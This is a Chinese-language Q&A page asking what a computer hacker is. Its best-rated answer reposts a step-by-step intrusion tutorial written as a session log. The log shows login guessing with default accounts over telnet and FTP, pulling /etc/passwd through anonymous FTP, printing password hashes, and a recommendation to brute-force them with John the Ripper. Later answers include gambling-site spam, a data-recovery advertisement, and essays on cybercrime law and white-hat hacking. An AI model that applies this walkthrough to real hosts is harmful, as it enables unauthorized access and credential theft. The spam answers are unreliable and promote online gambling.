?
Lv 4
? 發問時間: 電腦與網際網路軟體 · 2 0 年前

電腦駭客是啥?

電腦駭客是啥?

電腦駭客是啥?

11 個解答

評分
  • 2 0 年前
    最佳解答

    駭客入侵流程分析圖 http://myweb.hinet.net/home9/sis767/w-6.htm

    主機入侵基本做法

    [前言]

    對於著作這份文章的目的並不是在於教育. 因為個人覺得台灣的網路雖然已經有所發展

    了. 但是對於網路安全的重要性卻是漠不關心, 或者是沒有足夠的知識, 這是相當危險

    的一個現象, 就算是大專院校, 政府機構, 公司行號, 甚至是網路業者 ISP 對於網路

    安全和系統管理的正確觀念和態度實在是相當缺乏, 所以說不定在往後的日子裡, 只要

    一台 PC 和一台數據機, 就可以讓整個台灣網路崩潰, 甚至是引起經濟危機! 就像是一

    個小孩子拿著一把槍在路上逛一樣! 所以我寫這篇文章純粹是為了台灣網路安全而寫的.

    並不希望有人因為這篇文章而去做違法的事情, 尤其是破壞別人的系統或是檔案! 當然

    啦, 如果有人因此做了違法的事情, 本人概不負責!

    [開始]

    起先最最最基本的就是要用 telnet 和 ftp 了, 它們兩個可是入侵的好幫手呦

    網路上有許多的 telnet 的版本, 有彩色的啦, 中文相容的啦, 很多很多但是如果你不

    想花時間去下載的話, 沒關係! 在 windows 下的 Ms-Dos 也有提供一個好用的 telnet

    當然也有 ftp 啦! 如果你有 telnet 的軟體的話就打開吧.

    沒有的就用 Ms-Dos 的 telnet 只要在 Ms-Dos 下打 telnet 就可以了, 然後就開始吧.

    先連到自己的或者是你可以用的主機上

    SunOS 5.6

    login: Love-gone

    Password:

    Last login: Sun May 10 15:01:45 from 111.222.333.444

    tcsh: getwd: Cannot open directory "../" (Permission denied)

    tcsh: Trying to start from "/home/Love-gone"

    Sun Microsystems Inc. SunOS 5.6 Generic August 1997

    Copyright by Andrew Chen 98/01/07

    You have new mail.

    (這是我以前入侵過的了, 現在我把它當成是中間伺服器了, 當然了 IP 和帳號都已經被我

    改了ㄚ, 怎麼可能用真的 IP 呢!

    先使用 who 確定一下這個主機現在有什麼人

    >who

    judge4 pts/1 May 10 15:17 (111.222.333.444)

    root console May 9 12:24 (:0)

    root pts/9 May 9 12:24 (:0.0)

    看來主機上應該不會有人發現我, 這樣就可以放心的連到要攻擊的目標上了

    >telnet www.fatman.com.tw (先用 telnet 過去)

    Trying 1.145.256.139...

    Connected to www.fatman.com.tw.

    Escape character is '^]'.

    fatman login: guest (先試一試 guest 這個公用帳號看看)

    Password:

    Login incorrect (啊! 不成功..沒關係. 我再試)

    fatman login: news

    Password:

    Connection closed by foreign host.

    (哇~~才兩次不成功就被趕出來了喔....這個系統還真狠..@&!J#~!)

    > telnet www.fatman.com.tw (沒關係...再給它玩看看)

    Trying 1.145.256.139...

    Connected to www.fatman.com.tw.

    Escape character is '^]'.

    fatman login: fatman (駭客的第六感...)

    Passwd:

    Login incorrect

    fatman login: system (這是系統的預設帳號...)

    Passwd:

    Login incorrect (看來已經被改過了..)

    Connection closed by foreign host.

    >ftp www.fatman.com.tw (改用 ftp 看看)

    Connected to www.fatman.com.tw.

    220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.

    User (www.fatman.com.tw:(none)): fatman (還是一樣試一下公司的名字)

    331 Password required for fatman.

    Password:

    530 Login incorrect.(真失敗, 今天運氣好像不太好的樣子)

    Login failed.

    ftp> user anonymous (用 anonymous 的公用帳號看看好了)

    331 Guest login ok, send your complete e-mail address as password.

    Password: (密碼隨便打..千萬別傻到打真的e-mail..打 qq@ 就好)

    230 Guest login ok, access restrictions apply.

    ftp>pwd

    (終於進來了..好辛苦..先看看自己在那個資料夾在說)

    257 "/" is current directory.

    ftp> ls -la (尋找一下目標 /etc)

    200 PORT command successful.

    150 Opening ASCII mode data connection for /bin/ls.

    total 8

    drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .

    drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..

    drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin

    drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc

    drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming

    drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib

    drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub

    drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr

    226 Transfer complete.

    491 bytes received in 3.13 seconds (0.16 Kbytes/sec)

    ftp> cd etc (嘻嘻....找到目標了)

    250 CWD command successful. (嗯! 可以進來...)

    ftp> ls -la (看一下有沒有我們要的密碼檔 /etc/passwd )

    200 PORT command successful.

    150 Opening ASCII mode data connection for /bin/ls.

    total 4

    drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .

    drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..

    -rwxrwxr-x 1 root wheel 258 Dec 3 1993 group

    -rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd

    226 Transfer complete.

    251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)

    ftp> get passwd (不會吧, 竟然那麼容易, 二話不說, 馬上抓密碼檔下來)

    200 PORT command successful.

    150 Opening ASCII mode data connection for /etc/passwd (321 bytes).

    226 Transfer complete.

    5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)

    ftp>bye (馬上走人)

    221 Goodbye.

    >cat passwd (看一下剛才的密碼檔是)

    root:*:0:0:root:/root:/bin/bash

    bin:*:1:1:bin:/bin:

    daemon:*:2:2:daemon:/sbin:

    adm:*:3:4:adm:/var/adm:

    lp:*:4:7:lp:/var/spool/lpd:

    sync:*:5:0:sync:/sbin:/bin/sync

    .

    .

    .

    [以下省略]

    (真衰, 是 shadow 過的密碼檔, 也難怪用 anonymous 就能抓下來, 如果就只有這個

    的話就無法解開密碼了, 但是可以從裡面的帳號知道 fatman 有提供那些服務. 像是

    uucp, mail, ftp, news, operator 是開機用的, 所以沒有用 .daemon 是用來分佩

    每一個帳號 的權限用的)

    >rm passwd (還是把它給消掉好了)

    >^D

    (再次入侵攻擊開始)

    Connected to www.fatman.com.tw.

    Escape character is '^]'.

    fatman login:nobody (先試一試被 shadow 過的密碼檔裡的帳號)

    Password: (密碼也打 nobody )

    Login incorrect

    fatman login:news (再試一下這個好了)

    Password: (也是 news )

    Linux 2.0.29.

    You have mail. (嗚哇啦! 進來了, 千萬別看別人的信喔)

    fatman:~$ cd /etc (看能不能進來)

    fatman:/etc$ ls (看一下)

    DIR_COLORS hosts passwd.old

    HOSTNAME hosts.allow passwd.save

    HOSTNAME~ hosts.allow~ passwd~

    group~ passwd

    host.conf passwd.OLD

    fatman:/etc$ cat passwd (接下來就直接看密碼再說)

    root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash

    poja:p7ptVmOq3nrUL.:559:100:XXXXXXXX:/home/w3/poja:/bin/bash

    michelle:AmcgVpzMufCZJs:560:100:michelle:/home/w3/kingtel/michelle:/bin/bash

    .

    .

    .

    [以下省略.密碼檔我已經盡量碼賽克了]

    (哇! 太好了! 趕快換 ftp 來秀一下吧)

    fatman:/etc$ ^C

    >ftp www.fatman.com.tw

    Connected to www.fatman.com.tw.

    220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.

    User (www.fatman.com.tw:(none)): news (用剛才入侵時的那個..)

    331 Password required for news.

    Password:

    331 news login ok!

    ftp>cd /etc

    250 CWD command successful.

    ftp>get passwd

    200 PORT command successful.

    150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).

    226 Transfer complete.

    5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)

    ftp>bye (落跑了. 閃喔!)

    221 Goodbye.

    拿到密碼檔(/etc/passwd)後要做的就是破解它呀, 看來我必須在這裡說明一下

    passwd 的格式和意義了...

    例如:

    root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash

    密碼格式大多都是這個樣子的. 然後每一欄都是用分號分開的, 大多是 6 個分號

    當然密碼格式有很多種, 據我所知. 目前我看過的密碼格式有 5 種了, 但是大多數

    應該都是用 6 個分號的這種為多, 然而每一欄代表的意義如下..

    root:使用者名稱

    L3mUc0CQtJbtQ:是已經經過編譯的密碼(coded-password)

    0:UID(User Identification Number),就是使用者辨識碼

    0:GID,就是使用群組的辨識碼

    root:comments, 註解欄, 可能是電話號碼 or 住址

    /root:home directory, 就是所謂的來源目錄, 即你的工作目錄

    /bin/bash:這一欄是表示使用者簽入系統後, 第一個執行的程式

    因為是已經編譯過的單向密碼(One-Way Passwd), 所以不可能反組譯, 就只能使用所

    謂的暴力破解法了, 關於暴力破解法的程式有很多, 在此就不討論了解! 我想你應該

    都知道才對! 建議你我用的是 John4.0

    以上文章轉貼於小恐龍工作坊

    參考資料: 自己的知識
  • 6 年前

    ●九州 娛樂 網站 http://ts777.cc/

    ●●●運彩遊戲、真人遊戲、電子遊戲、對戰遊戲、對戰遊戲●●●

    ●新舊會員儲值就送500點

    ● 真人百家樂彩金等你拿

    ●線上影片直播、正妹圖、討論區免費註冊

    歡迎免費體驗交流試玩!

    ●九州 娛樂 網站 http://ts777.cc/

  • 6 年前

    硬碟要找硬碟醫院,能救回來才重要,我司就是找他們做出來的

    必須要推,當初心急亂找錯店告訴我沒辦法,後來找又找到硬碟醫院,我告訴他真心要來救援,可以等,在他們努力下有找回來

    太棒了,原來微軟張經理都找過他們

    http://www.datahelp.com.tw/

    http:/www.datamaster.com.tw

    #@@#

    從2009年就一直配合找他們,送10顆還救回來7顆,之前送別家,成功率不是太高,後來就都找硬碟醫院,經驗值和年份,和實際案件來說是比較可參考的,價格算是中等

    http://www.datahelp.com.tw/

    http:/www.datamaster.com.tw

  • 匿名使用者
    6 年前

    您期待已久的 8891娛樂城 熱烈開幕囉!

    8891娛樂城以優質的服務領先業界

    多位美女客服24小時即時線上為您服務!

    8891娛樂城有優於市面所有運動投注遊戲盤口的賠率

    以及免下載辣妹視訊百家樂、21點、骰寶、各國賓果、餐廳賓果、彩球遊戲

    另有數百位真人視訊聊天辣妹與您進行互動聊天還有"精彩"電影喔!

    心動了嗎!! 快來體驗市面上最完質最高品質的服務

    現在有開放免費試玩喔! 網址 : 8891.NET

  • 您覺得這個回答如何?您可以登入為回答投票。
  • 匿名使用者
    6 年前

    【亞洲36588合法彩券公司直營 官網: A36588.NET 】

    【 最新活動→迎接新會員,首存狂送20% 】

    【運動→電子→對戰→現場→彩球 】

    【免費服務 →電影區、討論區、KTV歡唱、運動轉播、即時比分、24H客服 】

    【亞洲36588合法彩券公司直營 官網: A36588.NET 】

  • 匿名使用者
    7 年前

    台灣第一家合法博弈娛樂城熱烈開幕!

    運動彩、遊戲對戰、現場百家樂、多國彩球

    高賠率投注,歡迎您免費體驗!

    網址 TS8855.NET

  • 2 0 年前

     網際網路的興起與普及化,使資訊得以迅速流通,其虛擬化、無國界並兼具媒介與場所的特性,提供人們超越地理限制的新舞台,然而此一創造網際網路迷人多樣化風貌的優點,卻也是有心人絕佳的犯罪工具、犯罪場所與犯罪目標,因而造就某些新的犯罪型態。與傳統犯罪不同的是,網路犯罪更容易造成跨國性的損害,但這種損害通常是實體而非虛擬的。

      提到網路犯罪,大家似乎都會投注特別的關切,如何防制網路犯罪甚至已成為八大工業國與企業領袖高峰會討論的重要議題。而有趣的是,政府代表對於處理網路犯罪多數採取積極介入之態度,企業卻傾向保留。不過此種分歧的產生並不難理解,畢竟政府是站在執行公權力的角度,而企業之所以持保留態度,主要則是擔憂政府過度干預,將使網路自由遭到箝制,影響網路發展。

      要談網路犯罪,首應瞭解什麼是電腦犯罪,只是目前世界各國對電腦犯罪似乎都還沒有一致、明確的定義,不過電腦犯罪的行為人所違犯的必須是與電腦特性有關的犯罪(註一),則是沒有爭議的。而所謂電腦特性則指電腦具有之快速隱密而有效地處理、傳遞大量資料之功能(註二)。所謂網路犯罪,則屬於電腦犯罪的下位概念,簡言之即為電腦犯罪之電腦網路類型(註三)。

      依內政部警政署刑事警察局之統計,我國網路犯罪類型包括網路色情、網路上販賣違禁藥物、透過網路公然煽惑他人犯罪、網路詐欺、網路恐嚇、網路誹謗與公然侮辱、入侵他人網站(本文以下稱之為駭客入侵)...等等態樣。嚴格說來,色情、販賣違禁藥物、煽惑他人犯罪、詐欺、恐嚇、誹謗與侮辱並不是網路興起後新發生的犯罪類型,這些偏差行為原本就是法律處罰的對象,我們沒有理由因為行為人現在是透過網路來違犯,在法律上就給予其不同評價。不過像駭客入侵這類的行為,確實是因為電腦網路興起才產生的,法律-尤其是刑法,是否足以規範這樣的行為,當然還是得從構成要件來判斷。

      依據國內外相關資料顯示,網路犯罪之行為人通常具有高學歷、低社會歷練的特性,同時由於網路犯罪之偵查難度高,追訴成效偏低,因此具有相當高的犯罪黑數。其中駭客入侵案件絕大多數都是年輕的電腦高手所為,其犯罪技術屬電腦犯罪中最為複雜的一種,加上網際網路無遠弗屆的力量,行為人可經由遠端操作進行其入侵行為,此種完全數位化的犯罪過程可說是對偵查技術的嚴苛挑戰。行為人與執法機關所進行的是技術之競賽,而科技進步的無限可能性又使之成為無止境的競賽。

      所謂駭客,最廣義的解釋為未經授權逕行進出電腦系統之人,不過單純任意進出他人電腦系統恐怕連被入侵者都難以察覺,因此將駭客入侵做如此廣泛的定義並無實益,比較實際的說法是「機構外之行為人(指外賊)蓄意以非法之方法,未經電腦主機所有人或系統管理者之同意逕行進出電腦系統,並使用高超技術進行不法侵害的電腦玩家」(詳註三)。簡言之,所謂駭客入侵應是由機構外行為人所蓄意發動(理論上當然可能存在過失的入侵,不過實際上恐怕很難想像),其未經電腦主機所有人或系統管理者之同意逕行進出電腦系統,並進行不法侵害。因此電腦駭客的一般行為模式,通常包括未經授權進入他人系統,偷窺系統資料、複製資料、更改或刪除檔案資料等,例如我國首樁典型的網路駭客案件--八十七年間刑事警察局破獲的黃姓軍醫入侵案,這位黃姓軍醫涉嫌入侵國內各網際網路服務提供者的電腦網路,刪除系統資料並竊取相關資料,其行為即不脫離前面所提的類型,即使是國外著名的駭客入侵案件也是一樣,至於其所造成的震撼性高低,就看被入侵者的身份以及所竊取或破壞的資料的重要性而定了。

      為了因應電腦犯罪問題,世界各國均陸續進行修法,以避免無法可管的窘境,我國刑法亦針對電腦犯罪問題作

  • 匿名使用者
    2 0 年前

    「駭客」這個字眼是由「Hacker」這個英文單字翻譯而來,「Hacker」這個單字在原本英文字典裡所代表的是:「一個對於程式設計、系統安全與網路安全非常樂衷研究的人,並且擁有高超的知識與技術」;也就是說原本「駭客」是指那些熱衷專研電腦系統的專家,並不是像目前這樣,變成了危害網路系統安全者的代名詞。所以現在報章媒體或一般民眾,都把入侵破壞人家網站的人稱為「駭客」,其實是有點誤解、污辱了當初原本「Hacker」這個字眼真正代表的意義。

    但是這世界就是有許多這麼無奈的事,一群稍懂得電腦網路皮毛知識的玩家,打著自許為「駭客」的封號,四處去入侵、破壞別人的網站,造成大家誤以為駭客就是那些專門破壞人家系統的**。所以「駭客」在現今世界裡,已經變成了負面的含義,通常是指那些專門利用網路電腦相關知識從事破壞犯罪的人。

    不過就算「駭客」一詞現在已經和壞蛋幾乎劃上等號,但是對於真正維持原本英文「Hacker」字眼原意的電腦專家,我們現在給了他們一個新的名詞,叫做「白帽駭客」(White-hat Hacker),也就是說他們雖然也是駭客,不過是屬於好的駭客,他們只專研系統那裡有弱點,然後公佈弱點出來讓大家防範,並不會利用研究出來的知識而去入侵破壞別人的系統,和那種**駭客是完全不一樣的。

  • 2 0 年前

    基本上駭客入侵的電腦通常都是有「機密性」的電腦

    有些駭客其實大多的目的本多不是賺錢

    而都是為了「表現」

    試想想看

    為什麼現在電腦都有漏洞

    而微軟都要去修補

    事實上!駭客的心思有時後是不定的

    參考資料: 自己
還有問題?馬上發問,尋求解答。